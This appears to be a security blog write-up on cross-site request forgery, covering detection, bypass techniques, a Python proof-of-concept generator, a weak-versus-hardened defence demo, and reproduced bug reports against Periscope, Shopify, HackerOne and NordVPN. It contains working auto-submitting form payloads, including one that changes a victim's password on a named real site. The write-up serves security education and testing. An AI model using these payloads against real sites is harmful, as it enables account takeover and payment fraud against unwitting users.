Day 3: Mastering CSRF — Essential Tricks & Techniques Based on Personal Experience and Valuable POCs
[ In collaboration with Sunil Kumawat ( LinkedIn | Twitter)]
Hey geeks, it4chis3c here with one more write-up on tricks & tips to detect CSRF.
Cross-Site Request Forgery (CSRF) is a web security vulnerability that forces an end user to execute unwanted actions on a web application in which they are authenticated. It works because the browser automatically attaches the victim's cookies (and other ambient credentials) to any request aimed at the target site, no matter which page issued it, so a page under the attacker's control can submit a request that the application treats as the victim's own. This can be exploited to perform a variety of malicious activities, such as transferring funds, changing account information, or even taking over a user's account. Understanding where to look for CSRF, how to detect it, and how to defend against it is crucial for securing web applications.
CSRF vulnerabilities can be found in various areas of a web application, particularly where user input is processed and state-changing actions are executed without re-authentication or a per-request secret. Common targets include:
- Forms that update user information: password reset forms, profile update forms, or any form that handles sensitive data.
- Actions that perform state changes: account deletion, subscription modifications, or any action that changes the application's state.
- Administrative functionalities: where higher-privilege actions can be performed, such as user management or system settings.
These areas are often overlooked, making them prime candidates for CSRF attacks.
Detecting CSRF involves checking whether the application verifies that a state-changing request was intentionally made by the user from its own pages. The key methods:
- Check for anti-CSRF tokens: the absence of a token on a state-changing request, or a token that is present but not actually validated (remove it, blank it or alter it and see whether the request still succeeds), indicates a vulnerability.
- Test state-changing actions: manually or with automation, replay the captured request from a page on an external origin and check whether the action is carried out without any user intent.
- Check Referer and Origin handling: analyse whether the application validates the Referer (and Origin) header, and what it does when the header is absent or contains the expected domain only as a substring.
- Check the session cookie's SameSite attribute: with SameSite=Lax or Strict the browser does not attach the cookie to a cross-site POST, which changes what is exploitable.
Tools such as Burp Suite's CSRF PoC generator turn a captured request into a test page, which makes it quick to try each state-changing request in the application.
To exploit a CSRF vulnerability, an attacker must craft a request that mimics a legitimate action. The common payloads and techniques include:
- Form-based requests: a form that automatically submits a POST request when the page loads.
- Image tag exploitation: an <img> tag whose src triggers a GET request.
- Link-based attacks: a malicious link that, when clicked, executes an action on behalf of the user.
Example payload:
<html><body>
<form action="http://vulnerable-website.com/update_profile" method="POST">
<input type="hidden" name="email" value="attacker@example.com" />
<input type="submit" value="Submit request" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
This code automatically submits the form to change the user’s email address when loaded in the user’s browser.
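As an added illustration of the detection steps and of the payload above (example code written for this write-up, not code from the original post or from any tool it mentions), the Python script below parses a request captured in a proxy, flags parameters that look like anti-CSRF tokens, decides whether the request is worth a CSRF test, and renders the same kind of auto-submitting form PoC. The host vulnerable-website.com, the parameter names and the https scheme are assumptions, and the sample request is constructed.

```python
import html
import re
from urllib.parse import parse_qsl

# Parameter names commonly used for synchronizer tokens (a heuristic, not exhaustive).
TOKEN_NAME_RE = re.compile(r"csrf|xsrf|authenticity|_token|anti[-_]?forgery|nonce", re.I)

# Constructed sample: a profile-update request as captured in an intercepting proxy.
# There is no token-like parameter and authentication is a cookie (assumed host).
SAMPLE_REQUEST = (
    "POST /update_profile HTTP/1.1\r\n"
    "Host: vulnerable-website.com\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Cookie: session=abc123\r\n"
    "\r\n"
    "email=attacker%40example.com&name=Bob"
)


def parse_request(raw):
    """Split a raw HTTP/1.1 request into (method, path, headers, form params)."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    params = parse_qsl(body, keep_blank_values=True) if body else []
    return method.upper(), path, headers, params


def find_token_params(params):
    """Names of parameters that look like anti-CSRF tokens."""
    return [name for name, _ in params if TOKEN_NAME_RE.search(name)]


def assess(raw):
    """Triage a captured request for CSRF testing. Returns (verdict, token_names)."""
    method, _path, headers, params = parse_request(raw)
    tokens = find_token_params(params)
    if method in ("GET", "HEAD", "OPTIONS"):
        # Safe methods should not change state; if this one does, that is itself the bug.
        return "safe-method", tokens
    if "cookie" not in headers:
        # Bearer/API-key auth carried in a header is not attached by the browser automatically.
        return "not-cookie-authenticated", tokens
    if tokens:
        # Still worth testing: is the token validated at all? Does removing it still succeed?
        return "token-present-verify-it-is-checked", tokens
    return "no-token-test-csrf", tokens


def build_poc(raw, scheme="https"):
    """Render an auto-submitting HTML form equivalent to the captured request,
    in the same shape as the payload shown above. Names and values are
    HTML-escaped so quotes in captured data do not break the form.
    The scheme is not in a raw request, so it is an assumed parameter."""
    method, path, headers, params = parse_request(raw)
    action = "%s://%s%s" % (scheme, headers["host"], path)
    inputs = "\n".join(
        '    <input type="hidden" name="%s" value="%s" />'
        % (html.escape(n, quote=True), html.escape(v, quote=True))
        for n, v in params
    )
    return (
        "<html><body>\n"
        '  <form action="%s" method="%s">\n'
        "%s\n"
        "  </form>\n"
        "  <script>document.forms[0].submit();</script>\n"
        "</body></html>"
    ) % (html.escape(action, quote=True), method, inputs)


if __name__ == "__main__":
    verdict, tokens = assess(SAMPLE_REQUEST)
    print("verdict:", verdict, "tokens:", tokens)
    if verdict == "no-token-test-csrf":
        print(build_poc(SAMPLE_REQUEST))
```

The generator only handles application/x-www-form-urlencoded bodies. A JSON endpoint cannot be hit with a plain form carrying the right Content-Type, so if the server really enforces application/json that request may not be exploitable this way at all; and a "token-present" verdict is not a pass, it is the cue to resend the request with the token removed.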
CSRF defenses can be bypassed if they are improperly implemented. Common bypass techniques include:
- Token stealing or predictability: if tokens are predictable (static per account, a counter, a timestamp) or can be read through XSS or a leaking endpoint, they can be placed in the forged request. Also test whether validation is skipped when the token parameter is simply removed or left empty.
- Referer header manipulation: some applications rely on the Referer header for CSRF protection. Many skip the check when the header is missing, which the attacking page can arrange with <meta name="referrer" content="no-referrer">, and a substring check passes when the expected domain appears anywhere in the attacker's URL, for example in a subdomain or in the path.
- Flawed double-submit cookies: the double-submit method compares a cookie value with a request parameter. If the server only checks that the two match, and the attacker can set a cookie on the target domain (for example from a subdomain they control), they can plant the same value in both places and pass the check.

Description: Periscope's Android app allows for direct actions via internal deep links without user confirmation, making it vulnerable to CSRF attacks.
Steps:
1. Use the deep link pscp://user/<user-id>/follow.
2. Embed it in a web page as follows:
<!DOCTYPE html>
<html>
<body>
<a href="pscp://user/<any user-id>/follow">CSRF DEMO</a>
</body>
</html>
3. When the victim clicks this link from their Android device, the deep link is executed, causing them to follow the user without confirmation.
Impact: An attacker can force users to follow specific accounts, potentially compromising their follow list or influencing the content they see.
Description: Shopify’s CSRF protection for adding PayPal as a payment provider can be bypassed due to the use of a static merchantId.
Steps:
1. Visit https://YOURDOMAIN.myshopify.com/admin/settings/payments and disconnect any existing PayPal account.
2. Click the link to activate PayPal Express Checkout.
3. Note the merchantId in the URL; it is static for the store, so it cannot serve as an anti-CSRF secret.
4. Use the merchantId in the following link:
https://YOURSUBDOMAIN.myshopify.com/admin/payments/complete_paypal_incontext_oauth/41?merchantId=REPLACEME&merchantIdInPayPal=5NS8DHQCFGT84&permissionsGranted=true&accountStatus=BUSINESS_ACCOUNT&consentStatus=true&productIntentID=addipmt&productIntentId=addipmt&isEmailConfirmed=true
Impact: When a logged-in store owner opens this link, the attacker's PayPal account gets linked to the victim's store, allowing the attacker to receive the store's payments fraudulently.
Description: HackerOne's login process could be exploited via login CSRF because the sign-in request was still accepted when the authenticity_token was removed.
Steps:
1. Go to https://hackerone.com/users/sign_in.
2. Capture the login request and remove the authenticity_token.
3. Use the following CSRF PoC (the hidden fields carry the attacker's own credentials):
<html><body>
<form action="https://hackerone.com/users/sign_in" method="POST">
<input type="hidden" name="user[email]" value="youremail" />
<input type="hidden" name="user[password]" value="yourpassword" />
<input type="hidden" name="user[remember_me]" value="1" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
4. When the victim loads the page, their browser is logged in to the attacker's account without any action on their part.
Impact: This is a login CSRF. The victim is silently working inside an account the attacker controls, so anything they do or submit on the site from then on is visible to the attacker, and the victim has no obvious sign that they are not in their own account.
Description: NordVPN’s profile settings allow for CSRF to change the user’s password.
Steps:
1. Use the following CSRF PoC:
<html><body>
<form action="https://nordvpn.com/profile/" method="POST">
<input type="hidden" name="tmpl" value="settings" />
<input type="hidden" name="password" value="password" />
<input type="hidden" name="password_confirmation" value="password" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
2. When the victim loads the page while logged in, their password is changed to the attacker-chosen value.
Impact: An attacker can change the victim’s password, gaining unauthorized access to their account.
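The bypass classes listed earlier, together with the "remove the token" trick from the HackerOne PoC and the missing-token case of the NordVPN PoC, as an added example that is not part of the original write-up: each server-side check is written in a weak form and a hardened form, next to the attacker input that tells them apart. The target origin, the cookie and parameter names, the session ids and the attacker host names are all assumptions made for the demonstration; none of this is code from the programs mentioned above.

```python
import hashlib
import hmac
import secrets
from urllib.parse import urlsplit

SITE_ORIGIN = "https://vulnerable-website.com"   # assumed target origin


# 1. Token validation that is skipped when the parameter is deleted
def token_check_weak(session_token, form):
    """Weak: only validates when a token is supplied, so removing the field passes."""
    supplied = form.get("authenticity_token")
    return supplied is None or hmac.compare_digest(supplied, session_token)


def token_check_strict(session_token, form):
    """Hardened: a state-changing request without a valid token is rejected."""
    supplied = form.get("authenticity_token")
    return supplied is not None and hmac.compare_digest(supplied, session_token)


# 2. Referer / Origin validation
def referer_check_weak(headers):
    """Weak: substring match, and a missing Referer is waved through."""
    ref = headers.get("referer")
    if ref is None:
        return True                            # attacker page uses a no-referrer policy
    return "vulnerable-website.com" in ref     # also true for vulnerable-website.com.attacker.example


def origin_check_strict(headers):
    """Hardened: exact origin comparison, Origin first then Referer;
    a request with neither header is treated as cross-site."""
    for name in ("origin", "referer"):
        value = headers.get(name)
        if value:
            parts = urlsplit(value)
            return "%s://%s" % (parts.scheme, parts.netloc) == SITE_ORIGIN
    return False


# 3. Double-submit cookie
def double_submit_weak(cookies, form):
    """Weak: cookie == parameter is the whole check. An attacker who can set a cookie
    on the target domain (e.g. from a subdomain) plants the same value in both places."""
    cookie = cookies.get("csrf")
    return cookie is not None and cookie == form.get("csrf")


SERVER_KEY = secrets.token_bytes(32)   # per-deployment secret, never sent to clients


def issue_signed_token(session_id):
    """Hardened variant: bind the cookie value to the session under a server-side key."""
    nonce = secrets.token_hex(16)
    mac = hmac.new(SERVER_KEY, ("%s:%s" % (session_id, nonce)).encode(), hashlib.sha256).hexdigest()
    return "%s.%s" % (nonce, mac)


def double_submit_signed(session_id, cookies, form):
    """Cookie and parameter must match AND the MAC must verify for this session,
    so a value the attacker planted themselves is rejected."""
    token = cookies.get("csrf", "")
    if not token or not hmac.compare_digest(token, form.get("csrf", "")):
        return False
    nonce, _, mac = token.partition(".")
    expected = hmac.new(SERVER_KEY, ("%s:%s" % (session_id, nonce)).encode(), hashlib.sha256).hexdigest()
    return hmac.compare_digest(mac, expected)


def legit_round_trip(session_id):
    """Happy path for the signed scheme: server sets the cookie, the page echoes it."""
    token = issue_signed_token(session_id)
    return double_submit_signed(session_id, {"csrf": token}, {"csrf": token})


# Constructed attacker inputs
NO_REFERER = {}
LOOKALIKE = {"referer": "https://vulnerable-website.com.attacker.example/csrf.html"}
PLANTED = {"csrf": "attacker-chosen"}


def demo():
    """True means the request is accepted; the weak variants accept the attacker's input."""
    return {
        "token removed, weak check":   token_check_weak("real", {"email": "x"}),
        "token removed, strict check": token_check_strict("real", {"email": "x"}),
        "no referer, weak check":      referer_check_weak(NO_REFERER),
        "lookalike host, weak check":  referer_check_weak(LOOKALIKE),
        "lookalike host, strict":      origin_check_strict(LOOKALIKE),
        "planted cookie, weak":        double_submit_weak(PLANTED, PLANTED),
        "planted cookie, signed":      double_submit_signed("s1", PLANTED, PLANTED),
        "legit signed round trip":     legit_round_trip("s1"),
    }


if __name__ == "__main__":
    for case, outcome in demo().items():
        print("%-30s %s" % (case, outcome))
```

The Shopify case belongs to the first category: a merchantId that is fixed for the store is a predictable value, not a secret the attacker lacks, so it gives no CSRF protection. Origin is sent on cross-origin form POSTs (as the literal value null when the page suppresses referrer information), which is why the hardened check consults it before Referer; SameSite cookies are the complementary browser-side defense.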
If you are still reading & find this blog interesting then do follow me on Twitter & LinkedIn for more write-ups
Stay tuned for Day 4, where we’ll dive into another vulnerability!